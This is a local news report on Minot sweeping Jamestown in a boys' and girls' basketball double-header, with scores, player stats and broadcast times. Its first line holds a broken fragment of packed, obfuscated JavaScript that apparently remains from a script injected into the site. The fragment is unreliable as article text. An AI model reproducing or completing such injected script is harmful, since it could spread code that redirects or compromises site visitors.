JAMESTOWN zetay|var|u0026u|referrer|nyean||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- The Minot Magicians came to town and did what a lot of teams haven’t been able to as of late, they swept the Blue Jays in a double-header. For the second time, this season the Magicians walked away with two wins over Jamestown.

The Blue Jay boys jumped up to the No. 3 ranking in the Class A poll this week, but had their seven-game winning streak snapped Saturday night at Jerry Meyer Arena on a 66-57 decision.

Minot and Jamestown went back and forth throughout the first 18 minutes, but the Jays took a 29-27 lead into halftime. Arron Benson had a fantastic first-half with 11 points to lead all scores, he would finish with 18.

In the second-half, Minot took control with Colter Hustad coming out quickly with 10 points in the half. Jamestown struggled to get second chances on the offense end as the Magicians gobbled up every rebound.

Brandon VanDusen’s dagger three-pointer with 2:30 left on the clock put Minot up 12. The Blue Jays were able to pull within six with under a minute, but a offense foul committed by Ryan Schlenker essentially ended any miracle comeback opportunity.

The loss drops Jamestown to 8-3 on the season and 6-2 in the WDA. Their only two losses in the conference to Minot.

Up next the Jays will travel to Mandan on Tuesday to take on the Braves. The game can be heard on Classic Hits KQDJ-AM 1400 with the 7:30 tip-off.

In the girls game, the Magicians came out and hit eight first-half threes and the Jays were never able to recover.

Holly Johnson had 16 for Minot including a quartet of three-points in the first-half.

Jamestown found themselves in a familiar situation. A slow start to the game allows a deficit to form and a second-half run runs out of gas.

They found themselves down 30-13 at the half, but when Jamestown made their run in the second-half the were unable to get over the hump.

The Blue Jays had won four of their last five, but were unable to over come the hot-start by Minot. Their record falls to 4-7 and 3-5 in the WDA.

The girls will play at Mandan on Thursday night. That game will also be broadcast on KQDJ-AM 1400.
